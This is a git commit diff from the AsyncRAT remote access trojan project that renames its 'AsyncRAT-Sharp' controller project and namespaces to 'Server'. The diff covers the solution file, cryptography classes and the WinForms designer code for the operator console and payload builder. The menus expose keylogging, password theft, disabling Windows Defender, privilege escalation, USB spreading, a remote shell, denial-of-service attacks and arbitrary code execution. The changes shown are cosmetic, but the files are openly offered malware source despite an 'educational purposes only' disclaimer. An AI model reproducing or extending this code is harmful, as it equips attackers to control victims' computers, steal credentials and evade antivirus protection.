Rename the server project

This commit is contained in:
NYAN CAT 2019-06-13 15:28:20 +03:00
parent f8ee3c0f5f
commit 15d3d2d07e
158 changed files with 911 additions and 911 deletions

View File

@ -1,9 +1,9 @@
 
Microsoft Visual Studio Solution File, Format Version 12.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15 # Visual Studio Version 16
VisualStudioVersion = 15.0.28307.168 VisualStudioVersion = 16.0.29009.5
MinimumVisualStudioVersion = 10.0.40219.1 MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AsyncRAT-Sharp", "AsyncRAT-Sharp\AsyncRAT-Sharp.csproj", "{7767C300-5FD5-4A5D-9D4C-59559CCE48A3}" Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server", "Server\Server.csproj", "{7767C300-5FD5-4A5D-9D4C-59559CCE48A3}"
EndProject EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Client", "Client\Client.csproj", "{C3C49F45-2589-4E04-9C50-71B6035C14AE}" Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Client", "Client\Client.csproj", "{C3C49F45-2589-4E04-9C50-71B6035C14AE}"
EndProject EndProject

View File

@ -7,7 +7,7 @@ using System.Security.Cryptography;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Cryptography namespace Server.Cryptography
{ {
public class Aes256 public class Aes256
{ {

View File

@ -1,7 +1,7 @@
using System.Security.Cryptography; using System.Security.Cryptography;
using System.Text; using System.Text;
namespace AsyncRAT_Sharp.Cryptography namespace Server.Cryptography
{ {
public static class Sha256 public static class Sha256
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp namespace Server
{ {
partial class Form1 partial class Form1
{ {
@ -223,7 +223,7 @@
// //
// aBOUTToolStripMenuItem // aBOUTToolStripMenuItem
// //
this.aBOUTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.info; this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info;
this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem"; this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem";
this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Text = "ABOUT";
@ -239,7 +239,7 @@
this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.tOMEMORYToolStripMenuItem, this.tOMEMORYToolStripMenuItem,
this.tODISKToolStripMenuItem}); this.tODISKToolStripMenuItem});
this.sENDFILEToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.tomem; this.sENDFILEToolStripMenuItem.Image = global::Server.Properties.Resources.tomem;
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem"; this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.sENDFILEToolStripMenuItem.Text = "Send File"; this.sENDFILEToolStripMenuItem.Text = "Send File";
@ -267,14 +267,14 @@
this.fileManagerToolStripMenuItem1, this.fileManagerToolStripMenuItem1,
this.processManagerToolStripMenuItem1, this.processManagerToolStripMenuItem1,
this.reportWindowToolStripMenuItem}); this.reportWindowToolStripMenuItem});
this.monitoringToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.monitoring_system; this.monitoringToolStripMenuItem.Image = global::Server.Properties.Resources.monitoring_system;
this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem"; this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem";
this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.monitoringToolStripMenuItem.Text = "Monitoring"; this.monitoringToolStripMenuItem.Text = "Monitoring";
// //
// remoteDesktopToolStripMenuItem1 // remoteDesktopToolStripMenuItem1
// //
this.remoteDesktopToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.remotedesktop; this.remoteDesktopToolStripMenuItem1.Image = global::Server.Properties.Resources.remotedesktop;
this.remoteDesktopToolStripMenuItem1.Name = "remoteDesktopToolStripMenuItem1"; this.remoteDesktopToolStripMenuItem1.Name = "remoteDesktopToolStripMenuItem1";
this.remoteDesktopToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.remoteDesktopToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.remoteDesktopToolStripMenuItem1.Text = "Remote Desktop"; this.remoteDesktopToolStripMenuItem1.Text = "Remote Desktop";
@ -282,7 +282,7 @@
// //
// keyloggerToolStripMenuItem1 // keyloggerToolStripMenuItem1
// //
this.keyloggerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.logger; this.keyloggerToolStripMenuItem1.Image = global::Server.Properties.Resources.logger;
this.keyloggerToolStripMenuItem1.Name = "keyloggerToolStripMenuItem1"; this.keyloggerToolStripMenuItem1.Name = "keyloggerToolStripMenuItem1";
this.keyloggerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.keyloggerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.keyloggerToolStripMenuItem1.Text = "Keylogger"; this.keyloggerToolStripMenuItem1.Text = "Keylogger";
@ -290,7 +290,7 @@
// //
// passwordRecoveryToolStripMenuItem1 // passwordRecoveryToolStripMenuItem1
// //
this.passwordRecoveryToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.key; this.passwordRecoveryToolStripMenuItem1.Image = global::Server.Properties.Resources.key;
this.passwordRecoveryToolStripMenuItem1.Name = "passwordRecoveryToolStripMenuItem1"; this.passwordRecoveryToolStripMenuItem1.Name = "passwordRecoveryToolStripMenuItem1";
this.passwordRecoveryToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.passwordRecoveryToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.passwordRecoveryToolStripMenuItem1.Text = "Password Recovery"; this.passwordRecoveryToolStripMenuItem1.Text = "Password Recovery";
@ -298,7 +298,7 @@
// //
// fileManagerToolStripMenuItem1 // fileManagerToolStripMenuItem1
// //
this.fileManagerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager; this.fileManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.filemanager;
this.fileManagerToolStripMenuItem1.Name = "fileManagerToolStripMenuItem1"; this.fileManagerToolStripMenuItem1.Name = "fileManagerToolStripMenuItem1";
this.fileManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.fileManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.fileManagerToolStripMenuItem1.Text = "File Manager"; this.fileManagerToolStripMenuItem1.Text = "File Manager";
@ -306,7 +306,7 @@
// //
// processManagerToolStripMenuItem1 // processManagerToolStripMenuItem1
// //
this.processManagerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.process; this.processManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.process;
this.processManagerToolStripMenuItem1.Name = "processManagerToolStripMenuItem1"; this.processManagerToolStripMenuItem1.Name = "processManagerToolStripMenuItem1";
this.processManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.processManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.processManagerToolStripMenuItem1.Text = "Process Manager"; this.processManagerToolStripMenuItem1.Text = "Process Manager";
@ -317,7 +317,7 @@
this.reportWindowToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { this.reportWindowToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.runToolStripMenuItem1, this.runToolStripMenuItem1,
this.stopToolStripMenuItem2}); this.stopToolStripMenuItem2});
this.reportWindowToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.report; this.reportWindowToolStripMenuItem.Image = global::Server.Properties.Resources.report;
this.reportWindowToolStripMenuItem.Name = "reportWindowToolStripMenuItem"; this.reportWindowToolStripMenuItem.Name = "reportWindowToolStripMenuItem";
this.reportWindowToolStripMenuItem.Size = new System.Drawing.Size(270, 34); this.reportWindowToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.reportWindowToolStripMenuItem.Text = "Report Window"; this.reportWindowToolStripMenuItem.Text = "Report Window";
@ -347,14 +347,14 @@
this.remoteShellToolStripMenuItem1, this.remoteShellToolStripMenuItem1,
this.dOSAttackToolStripMenuItem, this.dOSAttackToolStripMenuItem,
this.executeNETCodeToolStripMenuItem}); this.executeNETCodeToolStripMenuItem});
this.miscellaneousToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.Miscellaneous; this.miscellaneousToolStripMenuItem.Image = global::Server.Properties.Resources.Miscellaneous;
this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem"; this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem";
this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.miscellaneousToolStripMenuItem.Text = "Miscellaneous"; this.miscellaneousToolStripMenuItem.Text = "Miscellaneous";
// //
// getAdminPrivilegesToolStripMenuItem // getAdminPrivilegesToolStripMenuItem
// //
this.getAdminPrivilegesToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; this.getAdminPrivilegesToolStripMenuItem.Image = global::Server.Properties.Resources.uac;
this.getAdminPrivilegesToolStripMenuItem.Name = "getAdminPrivilegesToolStripMenuItem"; this.getAdminPrivilegesToolStripMenuItem.Name = "getAdminPrivilegesToolStripMenuItem";
this.getAdminPrivilegesToolStripMenuItem.Size = new System.Drawing.Size(329, 34); this.getAdminPrivilegesToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.getAdminPrivilegesToolStripMenuItem.Text = "Get Admin Privileges"; this.getAdminPrivilegesToolStripMenuItem.Text = "Get Admin Privileges";
@ -362,7 +362,7 @@
// //
// disableWindowsDefenderToolStripMenuItem // disableWindowsDefenderToolStripMenuItem
// //
this.disableWindowsDefenderToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled; this.disableWindowsDefenderToolStripMenuItem.Image = global::Server.Properties.Resources.disabled;
this.disableWindowsDefenderToolStripMenuItem.Name = "disableWindowsDefenderToolStripMenuItem"; this.disableWindowsDefenderToolStripMenuItem.Name = "disableWindowsDefenderToolStripMenuItem";
this.disableWindowsDefenderToolStripMenuItem.Size = new System.Drawing.Size(329, 34); this.disableWindowsDefenderToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender"; this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
@ -370,7 +370,7 @@
// //
// botsKillerToolStripMenuItem // botsKillerToolStripMenuItem
// //
this.botsKillerToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller; this.botsKillerToolStripMenuItem.Image = global::Server.Properties.Resources.botkiller;
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem"; this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(329, 34); this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.botsKillerToolStripMenuItem.Text = "Bots Killer"; this.botsKillerToolStripMenuItem.Text = "Bots Killer";
@ -378,7 +378,7 @@
// //
// uSBSpreadToolStripMenuItem1 // uSBSpreadToolStripMenuItem1
// //
this.uSBSpreadToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.usb; this.uSBSpreadToolStripMenuItem1.Image = global::Server.Properties.Resources.usb;
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1"; this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(329, 34); this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread"; this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
@ -386,7 +386,7 @@
// //
// seedTorrentToolStripMenuItem1 // seedTorrentToolStripMenuItem1
// //
this.seedTorrentToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.u_torrent_logo; this.seedTorrentToolStripMenuItem1.Image = global::Server.Properties.Resources.u_torrent_logo;
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1"; this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(329, 34); this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent"; this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
@ -394,7 +394,7 @@
// //
// remoteShellToolStripMenuItem1 // remoteShellToolStripMenuItem1
// //
this.remoteShellToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.shell; this.remoteShellToolStripMenuItem1.Image = global::Server.Properties.Resources.shell;
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1"; this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(329, 34); this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
this.remoteShellToolStripMenuItem1.Text = "Remote Shell"; this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
@ -402,7 +402,7 @@
// //
// dOSAttackToolStripMenuItem // dOSAttackToolStripMenuItem
// //
this.dOSAttackToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; this.dOSAttackToolStripMenuItem.Image = global::Server.Properties.Resources.ddos;
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem"; this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(329, 34); this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.dOSAttackToolStripMenuItem.Text = "DOS Attack"; this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
@ -410,7 +410,7 @@
// //
// executeNETCodeToolStripMenuItem // executeNETCodeToolStripMenuItem
// //
this.executeNETCodeToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.coding; this.executeNETCodeToolStripMenuItem.Image = global::Server.Properties.Resources.coding;
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem"; this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(329, 34); this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code"; this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
@ -422,14 +422,14 @@
this.visitWebsiteToolStripMenuItem1, this.visitWebsiteToolStripMenuItem1,
this.sendMessageBoxToolStripMenuItem1, this.sendMessageBoxToolStripMenuItem1,
this.chatToolStripMenuItem1}); this.chatToolStripMenuItem1});
this.extraToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.extra; this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra;
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem"; this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
this.extraToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.extraToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.extraToolStripMenuItem.Text = "Extra"; this.extraToolStripMenuItem.Text = "Extra";
// //
// visitWebsiteToolStripMenuItem1 // visitWebsiteToolStripMenuItem1
// //
this.visitWebsiteToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.visit; this.visitWebsiteToolStripMenuItem1.Image = global::Server.Properties.Resources.visit;
this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1"; this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1";
this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.visitWebsiteToolStripMenuItem1.Text = "Visit Website"; this.visitWebsiteToolStripMenuItem1.Text = "Visit Website";
@ -437,7 +437,7 @@
// //
// sendMessageBoxToolStripMenuItem1 // sendMessageBoxToolStripMenuItem1
// //
this.sendMessageBoxToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.msgbox; this.sendMessageBoxToolStripMenuItem1.Image = global::Server.Properties.Resources.msgbox;
this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1"; this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1";
this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox"; this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox";
@ -445,7 +445,7 @@
// //
// chatToolStripMenuItem1 // chatToolStripMenuItem1
// //
this.chatToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.chat; this.chatToolStripMenuItem1.Image = global::Server.Properties.Resources.chat;
this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1"; this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1";
this.chatToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); this.chatToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.chatToolStripMenuItem1.Text = "Chat"; this.chatToolStripMenuItem1.Text = "Chat";
@ -456,7 +456,7 @@
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.clientToolStripMenuItem, this.clientToolStripMenuItem,
this.pCToolStripMenuItem}); this.pCToolStripMenuItem});
this.systemToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.system; this.systemToolStripMenuItem.Image = global::Server.Properties.Resources.system;
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem"; this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
this.systemToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.systemToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.systemToolStripMenuItem.Text = "System"; this.systemToolStripMenuItem.Text = "System";
@ -470,7 +470,7 @@
this.uninstallToolStripMenuItem, this.uninstallToolStripMenuItem,
this.toolStripSeparator3, this.toolStripSeparator3,
this.showFolderToolStripMenuItem}); this.showFolderToolStripMenuItem});
this.clientToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.client; this.clientToolStripMenuItem.Image = global::Server.Properties.Resources.client;
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem"; this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34); this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.clientToolStripMenuItem.Text = "Client"; this.clientToolStripMenuItem.Text = "Client";
@ -521,7 +521,7 @@
this.logoffToolStripMenuItem1, this.logoffToolStripMenuItem1,
this.restartToolStripMenuItem3, this.restartToolStripMenuItem3,
this.shutdownToolStripMenuItem1}); this.shutdownToolStripMenuItem1});
this.pCToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.pc; this.pCToolStripMenuItem.Image = global::Server.Properties.Resources.pc;
this.pCToolStripMenuItem.Name = "pCToolStripMenuItem"; this.pCToolStripMenuItem.Name = "pCToolStripMenuItem";
this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34); this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.pCToolStripMenuItem.Text = "PC"; this.pCToolStripMenuItem.Text = "PC";
@ -554,7 +554,7 @@
// //
// bUILDERToolStripMenuItem // bUILDERToolStripMenuItem
// //
this.bUILDERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.builder; this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder;
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem"; this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.bUILDERToolStripMenuItem.Text = "BUILDER"; this.bUILDERToolStripMenuItem.Text = "BUILDER";
@ -711,7 +711,7 @@
// //
// sTARTToolStripMenuItem // sTARTToolStripMenuItem
// //
this.sTARTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.play_button; this.sTARTToolStripMenuItem.Image = global::Server.Properties.Resources.play_button;
this.sTARTToolStripMenuItem.Name = "sTARTToolStripMenuItem"; this.sTARTToolStripMenuItem.Name = "sTARTToolStripMenuItem";
this.sTARTToolStripMenuItem.Size = new System.Drawing.Size(139, 32); this.sTARTToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
this.sTARTToolStripMenuItem.Text = "START"; this.sTARTToolStripMenuItem.Text = "START";
@ -719,7 +719,7 @@
// //
// sTOPToolStripMenuItem // sTOPToolStripMenuItem
// //
this.sTOPToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.stop__1_; this.sTOPToolStripMenuItem.Image = global::Server.Properties.Resources.stop__1_;
this.sTOPToolStripMenuItem.Name = "sTOPToolStripMenuItem"; this.sTOPToolStripMenuItem.Name = "sTOPToolStripMenuItem";
this.sTOPToolStripMenuItem.Size = new System.Drawing.Size(139, 32); this.sTOPToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
this.sTOPToolStripMenuItem.Text = "STOP"; this.sTOPToolStripMenuItem.Text = "STOP";

View File

@ -1,19 +1,19 @@
using System; using System;
using System.Windows.Forms; using System.Windows.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System.Threading.Tasks; using System.Threading.Tasks;
using Microsoft.VisualBasic; using Microsoft.VisualBasic;
using System.Linq; using System.Linq;
using System.Threading; using System.Threading;
using System.Drawing; using System.Drawing;
using System.IO; using System.IO;
using AsyncRAT_Sharp.Forms; using Server.Forms;
using AsyncRAT_Sharp.Cryptography; using Server.Cryptography;
using System.Diagnostics; using System.Diagnostics;
using System.Net.Sockets; using System.Net.Sockets;
using AsyncRAT_Sharp.Handle_Packet; using Server.Handle_Packet;
using AsyncRAT_Sharp.Helper; using Server.Helper;
using System.Security.Cryptography.X509Certificates; using System.Security.Cryptography.X509Certificates;
using System.Collections.Generic; using System.Collections.Generic;
@ -25,7 +25,7 @@ using System.Collections.Generic;
This program Is distributed for educational purposes only. This program Is distributed for educational purposes only.
*/ */
namespace AsyncRAT_Sharp namespace Server
{ {
public partial class Form1 : Form public partial class Form1 : Form

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormAbout partial class FormAbout
{ {

View File

@ -8,7 +8,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormAbout : Form public partial class FormAbout : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormBuilder partial class FormBuilder
{ {
@ -220,13 +220,13 @@ namespace AsyncRAT_Sharp.Forms
// //
// txtPastebin // txtPastebin
// //
this.txtPastebin.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Pastebin", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtPastebin.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Pastebin", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtPastebin.Enabled = false; this.txtPastebin.Enabled = false;
this.txtPastebin.Location = new System.Drawing.Point(106, 352); this.txtPastebin.Location = new System.Drawing.Point(106, 352);
this.txtPastebin.Name = "txtPastebin"; this.txtPastebin.Name = "txtPastebin";
this.txtPastebin.Size = new System.Drawing.Size(271, 26); this.txtPastebin.Size = new System.Drawing.Size(271, 26);
this.txtPastebin.TabIndex = 8; this.txtPastebin.TabIndex = 8;
this.txtPastebin.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Pastebin; this.txtPastebin.Text = global::Server.Properties.Settings.Default.Pastebin;
this.toolTip1.SetToolTip(this.txtPastebin, "IP:PORT .. Example 127.0.0.1:6606"); this.toolTip1.SetToolTip(this.txtPastebin, "IP:PORT .. Example 127.0.0.1:6606");
// //
// label6 // label6
@ -294,13 +294,13 @@ namespace AsyncRAT_Sharp.Forms
// //
// textFilename // textFilename
// //
this.textFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Filename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.textFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Filename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.textFilename.Enabled = false; this.textFilename.Enabled = false;
this.textFilename.Location = new System.Drawing.Point(103, 92); this.textFilename.Location = new System.Drawing.Point(103, 92);
this.textFilename.Name = "textFilename"; this.textFilename.Name = "textFilename";
this.textFilename.Size = new System.Drawing.Size(271, 26); this.textFilename.Size = new System.Drawing.Size(271, 26);
this.textFilename.TabIndex = 5; this.textFilename.TabIndex = 5;
this.textFilename.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Filename; this.textFilename.Text = global::Server.Properties.Settings.Default.Filename;
// //
// label3 // label3
// //
@ -336,7 +336,7 @@ namespace AsyncRAT_Sharp.Forms
// //
// pictureBox1 // pictureBox1
// //
this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; this.pictureBox1.Image = global::Server.Properties.Resources.uac;
this.pictureBox1.Location = new System.Drawing.Point(175, 72); this.pictureBox1.Location = new System.Drawing.Point(175, 72);
this.pictureBox1.Name = "pictureBox1"; this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(32, 32); this.pictureBox1.Size = new System.Drawing.Size(32, 32);
@ -356,12 +356,12 @@ namespace AsyncRAT_Sharp.Forms
// //
// txtMutex // txtMutex
// //
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtMutex.Location = new System.Drawing.Point(106, 165); this.txtMutex.Location = new System.Drawing.Point(106, 165);
this.txtMutex.Name = "txtMutex"; this.txtMutex.Name = "txtMutex";
this.txtMutex.Size = new System.Drawing.Size(271, 26); this.txtMutex.Size = new System.Drawing.Size(271, 26);
this.txtMutex.TabIndex = 11; this.txtMutex.TabIndex = 11;
this.txtMutex.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Mutex; this.txtMutex.Text = global::Server.Properties.Settings.Default.Mutex;
// //
// label5 // label5
// //
@ -482,63 +482,63 @@ namespace AsyncRAT_Sharp.Forms
// //
// txtFileVersion // txtFileVersion
// //
this.txtFileVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtFileVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtFileVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtFileVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtFileVersion.Enabled = false; this.txtFileVersion.Enabled = false;
this.txtFileVersion.Location = new System.Drawing.Point(159, 368); this.txtFileVersion.Location = new System.Drawing.Point(159, 368);
this.txtFileVersion.Name = "txtFileVersion"; this.txtFileVersion.Name = "txtFileVersion";
this.txtFileVersion.Size = new System.Drawing.Size(337, 26); this.txtFileVersion.Size = new System.Drawing.Size(337, 26);
this.txtFileVersion.TabIndex = 19; this.txtFileVersion.TabIndex = 19;
this.txtFileVersion.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtFileVersion; this.txtFileVersion.Text = global::Server.Properties.Settings.Default.txtFileVersion;
// //
// txtProductVersion // txtProductVersion
// //
